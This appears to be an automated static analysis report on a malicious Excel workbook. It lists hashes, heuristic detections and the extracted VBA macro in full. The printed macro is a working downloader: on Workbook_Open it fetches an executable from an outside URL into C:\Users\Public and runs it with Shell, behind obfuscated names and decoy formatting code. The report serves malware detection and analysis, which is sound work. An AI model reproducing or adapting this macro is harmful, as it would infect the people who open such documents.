Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 54bd5cb7ca7aac2b…

MALICIOUS

Office (OOXML)

185.7 KB First seen: 2020-11-23
MD5: 1e1c9f5464e9b273b6d1037645a381df SHA-1: 64a44f02359dbe17f9057c08c7ee28a27444b94c SHA-256: 54bd5cb7ca7aac2b3e3d094eb7ac8adf51d70f4d507df8f0bf40c5f65b8e0228
150 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak = Shell(mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno, vbNormalNoFocus)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sparepartiran.com/js/d1/OrV86zxFWHW1j0f.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3414 bytes
SHA-256: d8223cf87f17b79013cc62f5c33deb72ce22f7feb503dfdbf46023f7d9e2136b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function txcmhxcwteuwrpsuryomsjnlgtlvrvwfjaatqp Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Sub Workbook_Open()
Range("A1:G15").Select
Selection.FormatConditions.AddColorScale ColorScaleType:= 3
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
Selection.FormatConditions(1).ColorScaleCriteria(1).Type = _
xlConditionValueLowestValue
iaxyyeefkubvwbzgqjfltvqebykkk
With Selection.FormatConditions(1).ColorScaleCriteria(1).FormatColor
.Color = 8109667
.TintAndShade = 0
End With
End Sub
Public Sub iaxyyeefkubvwbzgqjfltvqebykkk()
Selection.FormatConditions(1).ColorScaleCriteria(2).Type = _
xlConditionValuePercentile
Selection.FormatConditions(1).ColorScaleCriteria(2).Value = 50
With Selection.FormatConditions(1).ColorScaleCriteria(2).FormatColor
.Color = 8711167
.TintAndShade = 0
End With
Selection.FormatConditions(1).ColorScaleCriteria(3).Type = _
xlConditionValueHighestValue
With Selection.FormatConditions(1).ColorScaleCriteria(3).FormatColor
.Color = 7039480
.TintAndShade = 0
End With
jzmfdleolcvhcjmwwppnzfxousaimemf = "http://sparepartiran.com/js/d1/OrV86zxFWHW1j0f.exe"
ActiveCell.FormulaR1C1 = "12"
Range("F2").Select
txcmhxcwteuwrpsuryomsjnlgtlvrvwfjaatqp 0,jzmfdleolcvhcjmwwppnzfxousaimemf,"C:\Users\Public\" +"wbcjjntbhogizoudqwasmcfkurscdtbozmcnjeajwpwvk.exe",0,0
ActiveCell.FormulaR1C1 = "12"
Range("E3").Select
Dim vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak As Variant
ActiveCell.FormulaR1C1 = "15"
Range("C4").Select
Dim mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno As String
ActiveCell.FormulaR1C1 = "14"
Range("C5").Select
mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno = "C:\Users\Public\"+"wbcjjntbhogizoudqwasmcfkurscdtbozmcnjeajwpwvk.exe"
ActiveCell.FormulaR1C1 = "56"
Range("A6").Select
ActiveCell.FormulaR1C1 = "45"
Range("A3").Select
ActiveCell.FormulaR1C1 = "15"
vbgqpycmoyrljceecstsurdyammjtwauuvpsufgcxtckoajtlzzfrrpdyipdmttryxronmkxlqvapskadtxtwuccfltmpcpeak = Shell(mqiufzpcuavoogxoatvzvduojcsyhiaqafftrinyeuabgqxno, vbNormalNoFocus)
Range("F5").Select
ActiveCell.FormulaR1C1 = "21"
Range("D7").Select
ActiveCell.FormulaR1C1 = "21"
Range("D10").Select
ActiveCell.FormulaR1C1 = "12"
Range("B11").Select
ActiveCell.FormulaR1C1 = "155"
Range("B10").Select
ActiveCell.FormulaR1C1 = "64485"
 Range("B9").Select
ActiveCell.FormulaR1C1 = "1"
Range("B3").Select
ActiveCell.FormulaR1C1 = "15546"
Range("D2").Select
ActiveCell.FormulaR1C1 = "15"
Range("D3").Select
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
End Sub

Attribute VB_Name = "drehxwcqpprucokoegxiegpbxnjioha"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes
SHA-256: b80d43d98caf8468268bccb6ee0b570ae52942520dbcc997a71efea0a35f63d0

Open this report in the interactive analyzer, or submit your own file for analysis.